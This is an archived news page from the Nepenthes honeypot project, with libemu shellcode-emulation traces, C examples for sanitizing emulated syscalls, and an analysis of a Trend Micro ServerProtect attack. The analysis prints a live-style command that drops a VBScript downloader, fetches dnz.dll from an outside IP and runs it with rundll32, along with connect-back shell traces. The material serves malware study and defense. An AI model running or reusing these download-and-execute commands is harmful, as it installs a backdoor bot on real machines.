Security/Honeypots and Honeynets - Nepenthes
About site: http://nepenthes.mwcollect.org/

A low interaction honeypot designed to emulate vulnerabilities worms use to spread, and to capture these worms.
This is websites2007.org cache of m/ as retrieved on 2008.09.08 websites2007.org's cache is the snapshot that we took of the page as we crawled the web. The page may have changed since that time.
Nepenthes - finest collection -

Welcome to the official nepenthes website! Nepenthes is a versatile tool to collect malware. It acts passively by emulating known vulnerabilities and downloading malware trying to exploit these vulnerabilities. Interested? Check our documentation and grab your copy.

July 21st 2008

the nanny at work

This is the list of system calls from the famous linkbot connectback filetransfer shellcode. I only transferred some bytes so it does not get too long.

    HMODULE LoadLibraryA ( LPCTSTR lpFileName = 0x0012fe90 => = "ws2_32";) = 0x71a10000;
    SOCKET socket ( int af = 2; int type = 1; int protocol = 0;) = 3;
    int connect ( SOCKET s = 3; struct sockaddr_in * name = 0x0012fc80 => struct = { short sin_family = 2; unsigned short sin_port = 6460 (port=15385); struct in_addr sin_addr = { unsigned long s_addr = -19321026 (host=62.47.217.254); }; char sin_zero = " "; }; int namelen = 16;) = 0;
    int recv ( SOCKET s = 3; char * buf = 0x0012fc90 => none; int len = 512; int flags = 0;) = 512;
    HMODULE LoadLibraryA ( LPCTSTR lpFileName = 0x0012fa58 => = "ws2_32";) = 0x71a10000;
    int send ( SOCKET s = 3; const char * buf = 0x0012fc60 => = ".binary." (4 bytes); int len = 4; int flags = 0;) = 4;
    HANDLE CreateFile ( LPCTSTR lpFileName = 0x0012fd38 => = "iplf.exe"; DWORD dwDesiredAccess = -1073741824; DWORD dwShareMode = 0; LPSECURITY_ATTRIBUTES lpSecurityAttributes = 0x00000000 => none; DWORD dwCreationDisposition = 1; DWORD dwFlagsAndAttributes = 2; HANDLE hTemplateFile = 0;) = 134989584;
    int recv ( SOCKET s = 3; char * buf = 0x0012fa60 => none; int len = 512; int flags = 0;) = 380;
    BOOL WriteFile ( HANDLE hFile = 134989584; LPCVOID lpBuffer = 0x0012fa60 => = ".binary." (380 bytes); DWORD nNumberOfBytesToWrite = 380; LPDWORD lpNumberOfBytesWritten = 0x0012fc70 => none; LPOVERLAPPED lpOverlapped = 0x00000000 => none;) = 1;
    int recv ( SOCKET s = 3; char * buf = 0x0012fa60 => none; int len = 512; int flags = 0;) = 0;
    BOOL CloseHandle ( HANDLE hObject = 134989584;) = 0;
    BOOL CreateProcess ( LPCWSTR pszImageName = 0x0012fd38 => = "iplf.exe"; LPCWSTR pszCmdLine = 0x00000000 => = ""; LPSECURITY_ATTRIBUTES psaProcess = 0x00000000 => none; LPSECURITY_ATTRIBUTES psaThread = 0x00000000 => none; BOOL fInheritHandles = 0; DWORD fdwCreate = 0; LPVOID pvEnvironment = 0x00000000 => none; LPWSTR pszCurDir = 0x00000000 => none; struct LPSTARTUPINFOW psiStartInfo = 0x0012fa14 => struct = { DWORD cb = 68; LPTSTR lpReserved = 0; LPTSTR lpDesktop = 0; LPTSTR lpTitle = 0; DWORD dwX = 0; DWORD dwY = 0; DWORD dwXSize = 0; DWORD dwYSize = 0; DWORD dwXCountChars = 0; DWORD dwYCountChars = 0; DWORD dwFillAttribute = 0; DWORD dwFlags = 0; WORD wShowWindow = 0; WORD cbReserved2 = 0; LPBYTE lpReserved2 = 0; HANDLE hStdInput = 0; HANDLE hStdOutput = 0; HANDLE hStdError = 0; }; struct PROCESS_INFORMATION pProcInfo = 0x0052f74c => struct = { HANDLE hProcess = 4711; HANDLE hThread = 4712; DWORD dwProcessId = 4713; DWORD dwThreadId = 4714; };) = 1;
    DWORD WaitForSingleObject ( HANDLE hHandle = 4713; DWORD dwMilliseconds = 256;) = 0;
    BOOL CloseHandle ( HANDLE hObject = 134989584;) = 0;
    ERROR DeleteFile ( LPCTSTR lpFileName = 0x0012fd38 => none;) = -1;
    int closesocket ( SOCKET s = 3;) = 0;
    void ExitThread ( DWORD dwExitCode = 4714;) = 0;

Obviously the shellcode works in the wild, but nevertheless the shellcode is buggy. After the connection streaming the file got shut down (recv() = 0), the file handle is closed (CloseHandle(134989584)); after executing the file, the file handle gets closed again (CloseHandle(134989584)). If you fclose() a file twice on Linux, the second call will segfault, as the memory accessed by the second fclose() has already been free()'d. Therefore we need a nanny, verifying we do not close files twice.

I just added some nanny code to subversion to deal with it in the sctest utility. Now the shellcode runs fine again in sctest; closing the same handle twice just gives the warning "shellcode tried to close not existing handle (maybe closed it already?)" on the console.
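As an added illustration of the nanny idea (this is example code written for this page, not libemu's sctest code), the following C program keeps a table of the handles an emulator has handed to the shellcode and refuses to close anything twice. The nanny_* names, the table size and the replay of the trace are assumptions of the example; the handle value 134989584 is the one from the trace above.

```c
/* Added example, not libemu's own code: a minimal "nanny" handle table for a
 * shellcode emulator, built around the double CloseHandle() seen in the
 * linkbot trace above. The nanny_* names and the replay are hypothetical. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define NANNY_MAX_HANDLES 16

struct nanny {
    uint32_t handles[NANNY_MAX_HANDLES]; /* live emulated HANDLE values, 0 = free slot */
    int warnings;                        /* suspicious calls seen, e.g. a double close */
};

static void nanny_init(struct nanny *n)
{
    memset(n, 0, sizeof *n);
}

/* Record a handle returned by an emulated CreateFile()/socket() hook.
 * Returns 0 on success, -1 when the table is full (the shellcode leaks handles). */
static int nanny_open(struct nanny *n, uint32_t h)
{
    for (int i = 0; i < NANNY_MAX_HANDLES; i++) {
        if (n->handles[i] == 0) {
            n->handles[i] = h;
            return 0;
        }
    }
    return -1;
}

static int nanny_is_open(const struct nanny *n, uint32_t h)
{
    for (int i = 0; i < NANNY_MAX_HANDLES; i++)
        if (n->handles[i] == h)
            return 1;
    return 0;
}

/* Emulated CloseHandle(): the host-side resource is released only once, no
 * matter how often the shellcode asks. Returns 1 (TRUE) when a live handle was
 * closed, otherwise 0 (FALSE) plus a warning instead of a second fclose() on
 * already freed memory. */
static int nanny_close(struct nanny *n, uint32_t h)
{
    for (int i = 0; i < NANNY_MAX_HANDLES; i++) {
        if (n->handles[i] == h) {
            n->handles[i] = 0;   /* a real emulator would fclose()/close() here, once */
            return 1;
        }
    }
    n->warnings++;
    fprintf(stderr, "shellcode tried to close not existing handle %u "
                    "(maybe closed it already?)\n", (unsigned)h);
    return 0;
}

/* Replay the file-handle part of the linkbot trace: one CreateFile(), a
 * CloseHandle() after recv() returned 0, another CloseHandle() after the
 * CreateProcess(). Returns the number of warnings raised (expected: 1). */
static int nanny_replay_linkbot_trace(void)
{
    struct nanny n;
    const uint32_t hfile = 134989584;   /* HANDLE value from the trace on the page */
    nanny_init(&n);
    nanny_open(&n, hfile);              /* CreateFile("iplf.exe") */
    nanny_close(&n, hfile);             /* first CloseHandle: legitimate */
    nanny_close(&n, hfile);             /* second CloseHandle: caught by the nanny */
    return n.warnings;
}

/* Self-check of the table logic; returns 1 when every step behaves as documented. */
static int nanny_selftest(void)
{
    struct nanny n;
    nanny_init(&n);
    if (nanny_open(&n, 7) != 0 || !nanny_is_open(&n, 7)) return 0;
    if (nanny_close(&n, 7) != 1 || nanny_is_open(&n, 7)) return 0;
    if (nanny_close(&n, 7) != 0 || n.warnings != 1) return 0;
    return 1;
}

int main(void)
{
    printf("double close warnings: %d\n", nanny_replay_linkbot_trace());
    return nanny_selftest() ? 0 : 1;
}
```

The point of routing every CloseHandle() through the table is that the emulator, not the shellcode, decides when the host resource is released; the shellcode's second close becomes a logged event rather than a crash of the analysis tool.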

July 19th 2008

nepenthes & libemu

I spent some time during the last months writing a libemu module for nepenthes. It turned out to be rather difficult, as nepenthes is a single-threaded program and shellcode emulation is slow and may require creating new processes. Installing software with a broken Makefile ran rm -rf / (yes, as root) on my system, therefore this effort got lost anyway. honeytrap is more likely to get working shellcode emulation than nepenthes; its multi-process structure fits the needs exactly.

But even if you do not have to worry about creating (sub)processes, emulating shellcode is not easy. Most shellcode is written as fire&forget: if the shellcode works, be glad; if it does not work, do not care about the attacked host. For example, relying on return values from system calls to create arguments on the stack, without verification. In this case, the shellcode relied on the return value of connect, and used it to create the length parameter for the recv syscall.

    HMODULE LoadLibraryA ( LPCTSTR lpFileName = 0x0012fe90 => = "ws2_32";) = 0x71a10000;
    SOCKET socket ( int af = 2; int type = 1; int protocol = 0;) = 3;
    int connect ( SOCKET s = 3; struct sockaddr_in * name = 0x0012fc80 => struct = { short sin_family = 2; unsigned short sin_port = 6460 (port=15385); struct in_addr sin_addr = { unsigned long s_addr = removed (host=removed); }; char sin_zero = " "; }; int namelen = 16;) = -1;
    int recv ( SOCKET s = 3; char * buf = 0x0012fc90 => none; int len = -64769; int flags = -1;) = -1;

As the connect failed, recv got called with a negative signed value (-64769) for the buffer size and -1 for the flags.

In other cases, shellcode misbehaves, for example it tries to connect to the attacker forever if the host is unreachable:

    while ( connect(...) );

Not to mention that shellcode is very hard to write and as error-prone as any other software, but once it works, it gets deployed. This shellcode wants to connect() to a remote host, but the namelen parameter is incorrect:

    int connect ( SOCKET s = 3; struct sockaddr_in * name = 0x0041728a => struct = { short sin_family = 2; unsigned short sin_port = 7470 (port=11805); struct in_addr sin_addr = { unsigned long s_addr = 1982129222 (host=70.228.36.118); }; char sin_zero = " "; }; int namelen = 4289293;) = 0;

Looking at the assembly reveals the problem is a typo:

    lea edx,[ebx+0x17f]
    mov byte [edx],0x16
    push edx ; push namelen
    lea edx,[ebx+0xfc]
    mov word [edx],0x2
    mov di,[ebx+0x8]
    mov [edx+0x2],di
    mov edi,[ebx+0x4]
    mov [edx+0x4],edi
    push edx ; push sockaddr *
    mov eax,[ebx+0xf8]
    push eax ; push socket
    call ds:[ebx+0x49] ; call connect(socket, sockaddr *, namelen)

As only the namelen is wrong, we can focus on the first lines:

    mov byte [edx],0x16
    push edx ; push namelen

This code stores 0x16 at memory address [edx] and pushes the memory address on the stack, instead of the value 0x16, which would be the appropriate value for namelen on win32. Unfortunately this code works, at least on Windows, else the worm (in this case the shellcode is csend from agobot) would not have had that impact and media attention in the past. If you emulate it on Linux, you have to sanitize the namelen argument.

Another point is that if we emulate code, we allow others to execute code on our boxes in a sandbox environment. Even though SQLSlammer has shown it is possible to write viral shellcode, current shellcode only helps getting access to a machine for further actions; but shellcode (tcp)scanning for vulnerable hosts and exploiting them is possible, and therefore we have to think about it.

One approach is to profile the shellcode: execute it in a closed sandbox, without proxying the syscalls to the host operating system, create a graph of the syscalls, measure the graph afterwards, guessing what the shellcode might want to do. This approach (simple finite-state graphs and a path matching scheme to determine the behavior of the shellcode) is outlined in ShellShock: Capturing Multi-Stage Attacks in Virtual Honeypots by Ryan Smith, Adam Prigden, Braxton Thomason, Vitaly Shmatikov, but the paper is not publicly available. One drawback of this approach is shellcode with more than one stage, as we can not profile the second stage, as the shellcode did not receive it in its closed sandbox.

So, what's left? The current idea is implementing a nanny for shellcode to make sure it behaves during interactive emulation; we'll see if it works out.
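The three misbehaviours above (recv() arguments derived from a failed connect(), the endless connect() loop, and the namelen typo) are exactly what a hook-level nanny has to catch before a syscall is proxied to the host. The following C program is an added example written for this page, not code from libemu or nepenthes; the nanny_* names, the retry budget and the flag mask are assumptions of the example, while the argument values replayed (-64769, -1, 4289293) come from the traces above.

```c
/* Added example, not libemu's own code: argument sanitizing for emulated win32
 * socket hooks, covering the three misbehaviours in the post above: recv()
 * arguments derived from a failed connect(), an endless connect() retry loop,
 * and a namelen that is a pointer instead of sizeof(sockaddr_in). The nanny_*
 * names and limits are hypothetical choices for this example. */
#include <stdio.h>

#define NANNY_SOCKADDR_IN_LEN      16  /* sizeof(struct sockaddr_in) on win32 */
#define NANNY_MAX_CONNECT_ATTEMPTS 8   /* budget for "while ( connect(...) );" loops */
#define NANNY_RECV_FLAGS_MASK      0x2 /* MSG_PEEK is the only flag passed through */

struct nanny_sock {
    int connect_attempts;
    int connected;
    int aborted;   /* set once the nanny decides the shellcode is spinning */
};

/* Emulated connect(): proxy at most NANNY_MAX_CONNECT_ATTEMPTS failing calls,
 * then keep failing and mark the emulation for termination. host_reachable
 * stands in for the result of the real connect() on the host. */
static int nanny_connect(struct nanny_sock *s, int host_reachable)
{
    if (s->aborted)
        return -1;
    s->connect_attempts++;
    if (host_reachable) {
        s->connected = 1;
        return 0;
    }
    if (s->connect_attempts >= NANNY_MAX_CONNECT_ATTEMPTS) {
        s->aborted = 1;
        fprintf(stderr, "nanny: %d failed connect() calls, stopping emulation\n",
                s->connect_attempts);
    }
    return -1;
}

/* namelen for connect(): csend pushes the address of the byte 0x16 instead of
 * 0x16 itself. Windows tolerates that, a Linux host would not, so anything but
 * the sockaddr_in size is replaced before the call is proxied. */
static int nanny_sanitize_namelen(int namelen)
{
    if (namelen != NANNY_SOCKADDR_IN_LEN) {
        fprintf(stderr, "nanny: namelen %d replaced by %d\n", namelen, NANNY_SOCKADDR_IN_LEN);
        return NANNY_SOCKADDR_IN_LEN;
    }
    return namelen;
}

/* recv(): len must fit the guest buffer and flags must be ones the hook
 * understands. Returns how many arguments had to be corrected. */
static int nanny_sanitize_recv(int *len, int *flags, int buf_capacity)
{
    int fixed = 0;
    if (*len < 0 || *len > buf_capacity) {
        fprintf(stderr, "nanny: recv len %d clamped to %d\n", *len, buf_capacity);
        *len = buf_capacity;
        fixed++;
    }
    if (*flags & ~NANNY_RECV_FLAGS_MASK) {
        fprintf(stderr, "nanny: recv flags 0x%x replaced by 0\n", (unsigned)*flags);
        *flags = 0;
        fixed++;
    }
    return fixed;
}

/* Replay of the first trace: connect() = -1 fed into recv(len=-64769, flags=-1)
 * with a 512 byte guest buffer. Returns the number of corrected arguments (2). */
static int nanny_replay_failed_connect_recv(void)
{
    int len = -64769, flags = -1;   /* values from the trace on the page */
    return nanny_sanitize_recv(&len, &flags, 512);
}

/* Replay of "while ( connect(...) );" against an unreachable host. Returns how
 * many connect() calls ran before the nanny stopped the loop. */
static int nanny_replay_connect_loop(void)
{
    struct nanny_sock s = {0, 0, 0};
    int calls = 0;
    while (nanny_connect(&s, 0) != 0) {
        calls++;
        if (s.aborted)
            break;                  /* without the nanny this loop never ends */
    }
    return calls;
}

int main(void)
{
    printf("namelen 4289293 -> %d\n", nanny_sanitize_namelen(4289293));
    printf("recv args corrected: %d\n", nanny_replay_failed_connect_recv());
    printf("connect() calls before abort: %d\n", nanny_replay_connect_loop());
    return 0;
}
```

The design choice worth noting is that each sanitizer logs what it changed: the corrected value keeps the emulation alive, and the log line is what tells the analyst that the shellcode relied on Windows-specific leniency or on an unchecked return value.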

February 14th 2008

nepenthes 0.2.2 release - happy valentines day

Grab your copy from Sourceforge.

November 7th 2007

As a change from the usual news, today: German politics.

war on errorism

On Friday the 9th November 2007 the German government will decide on new laws to protect civilians from terror attacks. The new laws include:

    telecommunication service providers, including mobile service and internet, have to save
      - number of the caller and callee
      - start & end time of any call, including timezone
      - type of service
      - in case of mobile services:
          - international number of caller and callee
          - IMSI identification of the mobile devices of caller and callee
          - the radio cell for caller and callee when starting the call
          - in case of anonymous services, service activation time and radio cell
      - in case of VoIP services, the IP address
      - the same rules apply for short and multimedia message services, including the time when the messages were sent and received

    email service providers
      - when sending an email, email and IP address of the sender as well as the email address of the recipient
      - when receiving email, the IP address of the sending "device", the sender's and receiver's email address
      - on access of an email box, the IP address of the accessor
      - timestamps for all previously mentioned points, including timezones

    internet service providers
      - the user's IP address
      - unique identifier of the access point
      - the session's start and end time, including the timezones

    providers of anonymization services
      - save each IP session

    providers of mobile services
      - save the radio cell's identifier to allow geographical locating

    for six months

In short, all communication signatures get stored for half a year, because everybody is a suspect, a potential terrorist the government has to keep track of.

TL;DR As usual, once the data is available (we are talking about 40 petabytes for only one major provider), there will be requests to use it; it is expensive to record, so better use it somehow if you fail at catching terrorists. The Intellectual Property Economy would definitely love accessing the database, allowing them to sue software pirates in real time. You could get a call that you have to pay some thousand for copyright infringement even before the damn mp3 finished. Marketing: 100% transparent customers, the more you know about the stingy customers, the better you can promote your products. Improve the press, remove whistleblowers, you have their communication signature in your records. Going to prison for controversial opinions becomes possible again.

This surveillance act suspects every civilian of being a terrorist, to protect the democracy. What's left of a democracy if it starts monitoring the whole population? Even though there was no successful act of terrorism in Germany during the last 20 years, terrorism won and the democracy lost when it removed its cornerstone to protect itself from terrorism. Trust no government until history has proven you wrong. On the other hand, there is still no publicly available data on which congressmen are paid as lobbyists, and congressmen are on the exception list for all surveillance actions. It is somehow part of human nature to prove that power corrupts once you have it.

September 19th 2007

libemu 0.1.0 release

Click this link to enter the libemu homepage, download your copy, and enjoy the first open source shellcode detection engine using emulation. It has been a lot of work, it took a lot of time and it is not complete yet; libemu based detection modules for honeytrap, nepenthes and snort are still todo. In the meantime you can enjoy the great shellcode detection commandline utility sctest to detect and profile shellcodes in suspicious dumps and create graphs of it.

August 24th 2007

Trend Micro ServerProtect

The Internet Stormcenter recently published a call for packets and asked for a shellcode analysis. We received the dump from the incident handler William Salusky and here is the libemu result:

the shellcode's graph

The shellcode spawns a command prompt and connects this shell to 219.150.93.35 10000.

the commands from the remote server

The server sends

    cd wins & ECHO SEt P=cREAtEOBjEct("micROSOFt.xmL"^&X^&"http"):P.OpEn "gEt",wScRipt.ARgUmEntS(0),0:P.SEnd():SEt S=cREAtEOBjEct("AdOdB.S"^&X^&"tREAm"):S.mOdE=3:S.tYpE=1:S.OpEn():S.wRitE(P.RESpOnSEBOdY):S.SAvEtOFiLE wScRipt.ARgUmEntS(1),2 >lite.vbe
    cmd.exe /c "cscript.exe lite.vbe http://61.129.112.73/images/menu/dnz.dll dnz.dll & rundll32 dnz.dll,ShellMain"

which gets executed by the attacked client. Removing the obfuscation, a file is downloaded from 61.129.112.73/images/menu/dnz.dll and stored as dnz.dll, which gets started by rundll32.

the downloaded file

The file is an IRC bot with very bad detection rates as of the virustotal run yesterday evening:

    File dnz.dll received on 08.23.2007 21:05:21 (CET)
    Result: 4/32 (12.5%)

    Antivirus          Version        Last Update  Result
    AhnLab-V3          2007.8.22.0    2007.08.23   -
    AntiVir            7.4.1.63       2007.08.23   -
    Authentium         4.93.8         2007.08.23   -
    Avast              4.7.1029.0     2007.08.23   -
    AVG                7.5.0.484      2007.08.23   BackDoor.Ircbot.BAO
    BitDefender        7.2            2007.08.23   -
    CAT-QuickHeal      9.00           2007.08.23   -
    ClamAV             0.91           2007.08.23   -
    DrWeb              4.33           2007.08.23   -
    eSafe              7.0.15.0       2007.08.23   -
    eTrust-Vet         31.1.5082      2007.08.23   -
    Ewido              4.0            2007.08.23   -
    FileAdvisor        1              2007.08.23   -
    Fortinet           2.91.0.0       2007.08.23   -
    F-Prot             4.3.2.48       2007.08.23   -
    F-Secure           6.70.13030.0   2007.08.23   -
    Ikarus             T 3.1.1.12     2007.08.23   -
    Kaspersky          4.0.2.24       2007.08.23   -
    McAfee             5104           2007.08.23   -
    Microsoft          1.2803         2007.08.23   -
    NOD32v2            2480           2007.08.23   probably a variant of Win32/IRCBot
    Norman             5.80.02        2007.08.23   -
    Panda              9.0.0.4        2007.08.23   -
    Prevx1             V2             2007.08.23   -
    Rising             19.37.32.00    2007.08.23   -
    Sophos             4.20.0         2007.08.23   -
    Sunbelt            2.2.907.0      2007.08.23   -
    Symantec           10             2007.08.23   -
    TheHacker          6.1.8.172      2007.08.23   -
    VBA32              3.12.2.3       2007.08.23   suspected of Backdoor.xBot.3
    VirusBuster        4.3.26:9       2007.08.23   -
    Webwasher-Gateway  6.0.1          2007.08.23   Win32.Malware.gen!92 (suspicious)

    Additional information
    File size: 24064 bytes
    MD5: 60cad46ccc51fefbadd1d0874c1c26d2
    SHA1: 1db02d6916122cc3065b86786c2a25a5eebd1af3

the advice

Apply patches in time, always.

the nasty shellcode details

For completeness, here are the details:

    cat session_8016.5168.raw2 | /opt/libemu/bin/sctest -S -g -s 100000000 -G dox.dot
    graph file dox.dot
    success
    Hook me Captain Cook!
    environment/win32/emu_env_w32_dll_export_kernel32_hooks.c:661
    emu_env_w32_hook_LoadLibrayA
    Hook me Captain Cook!
    environment/win32/emu_env_w32_dll_export_ws2_32_hooks.c:517
    emu_env_w32_hook_WSAStartup
    WSAStartup version 2
    Hook me Captain Cook!
    environment/win32/emu_env_w32_dll_export_ws2_32_hooks.c:461
    emu_env_w32_hook_WSASocketA
    SOCKET WSASocket(af=2, type=1, protocol=0, lpProtocolInfo=0, group=0,dwFlags=0);
    socket 3
    Hook me Captain Cook!
    environment/win32/emu_env_w32_dll_export_ws2_32_hooks.c:182
    emu_env_w32_hook_connect
    host 219.150.93.35 port 10000
    Hook me Captain Cook!
    environment/win32/emu_env_w32_dll_export_kernel32_hooks.c:134
    emu_env_w32_hook_CreateProcessA
    CreateProcessA
    CreateProcess(pszImageName=0, pszCmdLine=22cc80, psaProcess=0,psaThread=0, fInheritHandles=1, fdwCreate=0, pvEnvironment=0,pszCurDir=0, psiStartInfo=22cc2c, pProcInfo=22cc70)
    PROCESS_INFORMATION{ HANDLE hProcess=4711; HANDLE hThread=4712; DWORD dwProcessId=4713; DWORD dwThreadId=4714;}
    STARTUPINFO { DWORD cb=68; LPTSTR lpReserved=0x00000000; LPTSTR lpDesktop=0x00000000; LPTSTR lpTitle=0x00000000; DWORD dwX=0; DWORD dwY=0; DWORD dwXSize=0; DWORD dwYSize=0; DWORD dwXCountChars=0; DWORD dwYCountChars=0; DWORD dwFillAttribute=0; DWORD dwFlags=257; WORD wShowWindow=0; WORD cbReserved2=0; LPBYTE lpReserved2=0x080; HANDLE hStdInput=3; HANDLE hStdOutput=3; HANDLE hStdError=3;}
    Hook me Captain Cook!
    environment/win32/emu_env_w32_dll_export_kernel32_hooks.c:815
    emu_env_w32_hook_WaitForSingleObject
    WaitForSingleObject(hHandle=17920, dwMilliseconds=-1)
    Hook me Captain Cook!
    environment/win32/emu_env_w32_dll_export_ws2_32_hooks.c:152
    emu_env_w32_hook_closesocket
    Hook me Captain Cook!
    environment/win32/emu_env_w32_dll_export_kernel32_hooks.c:789
    emu_env_w32_hook_SetUnhandledExceptionFilter
    Exception filter 7c800000
    cpu error error accessing 0x7c81cdc7 not mapped
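"Removing the obfuscation" above is three mechanical steps, and an analyst wants them scripted rather than done by eye. The following C program is an added example written for this page (not from the original post, libemu or nepenthes): it undoes the cmd.exe caret escapes, folds case (VBScript is case-insensitive), collapses the "..."&X&"..." string concatenation under the assumption that X is never assigned and therefore Empty, and splits the script on ':' into statements. The deobf_* names are this example's own; the embedded sample is the ECHO argument quoted in the post.

```c
/* Added example, not from the original post or the libemu project: a small
 * deobfuscator for the ECHO payload above. It undoes the cmd.exe caret escapes,
 * folds case (VBScript is case-insensitive), collapses "a"&X&"b" where X is a
 * never-assigned (Empty) variable, and splits the script on ':' into statements.
 * Names (deobf_*) are this example's own; the sample is the page's ECHO text. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define DEOBF_MAX 1024
#define DEOBF_MAX_STMTS 32

/* Step 1: in cmd.exe a caret quotes the next character, so "^&" reaches the
 * .vbe file as "&". (Simplified: cmd's quote tracking is not modelled, which is
 * enough here because every caret in the sample sits outside double quotes.) */
static void deobf_strip_carets(const char *in, char *out, size_t outsz)
{
    size_t o = 0;
    for (size_t i = 0; in[i] && o + 1 < outsz; i++) {
        if (in[i] == '^' && in[i + 1])
            i++;                      /* drop the caret, keep the escaped character */
        out[o++] = in[i];
    }
    out[o] = '\0';
}

/* Step 3: "abc"&x&"def" with x Empty is just "abcdef"; drop the "&x&" joint. */
static void deobf_collapse_empty_concat(const char *in, char *out, size_t outsz)
{
    size_t o = 0;
    for (size_t i = 0; in[i] && o + 1 < outsz; i++) {
        if (in[i] == '"' && in[i + 1] == '&') {
            size_t j = i + 2;
            while (isalnum((unsigned char)in[j]) || in[j] == '_')
                j++;
            if (j > i + 2 && in[j] == '&' && in[j + 1] == '"') {
                i = j + 1;            /* skip '"&x&"'; the loop's i++ moves past it */
                continue;
            }
        }
        out[o++] = in[i];
    }
    out[o] = '\0';
}

/* Step 4: ':' separates VBScript statements, but only outside string literals. */
static int deobf_split_statements(const char *src, char stmts[][DEOBF_MAX], int max)
{
    int n = 0, inq = 0;
    size_t o = 0;
    for (size_t i = 0; src[i] && n < max; i++) {
        if (src[i] == '"')
            inq = !inq;
        if (src[i] == ':' && !inq) {
            stmts[n++][o] = '\0';
            o = 0;
            continue;
        }
        if (o + 1 < DEOBF_MAX)
            stmts[n][o++] = src[i];
    }
    if (n < max && o > 0)
        stmts[n++][o] = '\0';
    return n;
}

/* Whole pipeline; returns the number of statements written to stmts. */
static int deobf_vbe_echo(const char *echo_payload, char stmts[][DEOBF_MAX], int max)
{
    char a[DEOBF_MAX], b[DEOBF_MAX];
    deobf_strip_carets(echo_payload, a, sizeof a);
    for (size_t i = 0; a[i]; i++)       /* step 2: case folding */
        a[i] = (char)tolower((unsigned char)a[i]);
    deobf_collapse_empty_concat(a, b, sizeof b);
    return deobf_split_statements(b, stmts, max);
}

/* The ECHO argument sent by the remote server, as quoted in the post. */
static const char DEOBF_SAMPLE[] =
    "SEt P=cREAtEOBjEct(\"micROSOFt.xmL\"^&X^&\"http\"):P.OpEn \"gEt\",wScRipt.ARgUmEntS(0),0"
    ":P.SEnd():SEt S=cREAtEOBjEct(\"AdOdB.S\"^&X^&\"tREAm\"):S.mOdE=3:S.tYpE=1:S.OpEn()"
    ":S.wRitE(P.RESpOnSEBOdY):S.SAvEtOFiLE wScRipt.ARgUmEntS(1),2";

static int deobf_sample_count(void)
{
    char st[DEOBF_MAX_STMTS][DEOBF_MAX];
    return deobf_vbe_echo(DEOBF_SAMPLE, st, DEOBF_MAX_STMTS);
}

/* 1 if statement idx of the deobfuscated sample equals expected, else 0. */
static int deobf_sample_check(int idx, const char *expected)
{
    char st[DEOBF_MAX_STMTS][DEOBF_MAX];
    int n = deobf_vbe_echo(DEOBF_SAMPLE, st, DEOBF_MAX_STMTS);
    return idx >= 0 && idx < n && strcmp(st[idx], expected) == 0;
}

int main(void)
{
    char st[DEOBF_MAX_STMTS][DEOBF_MAX];
    int n = deobf_vbe_echo(DEOBF_SAMPLE, st, DEOBF_MAX_STMTS);
    for (int i = 0; i < n; i++)
        printf("%2d: %s\n", i + 1, st[i]);
    return 0;
}
```

Run stand-alone it prints nine statements, the first of which reads set p=createobject("microsoft.xmlhttp") and the fourth set s=createobject("adodb.stream"), which is the download-and-save-to-file pattern the post describes. Because the carets are stripped before the concatenation is collapsed, the same code also handles samples where the "&X&" trick is used without caret escaping.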

News Archive

Older news can be found in the news archive.

home.txt · Last modified: 2008/07/21 01:14
 
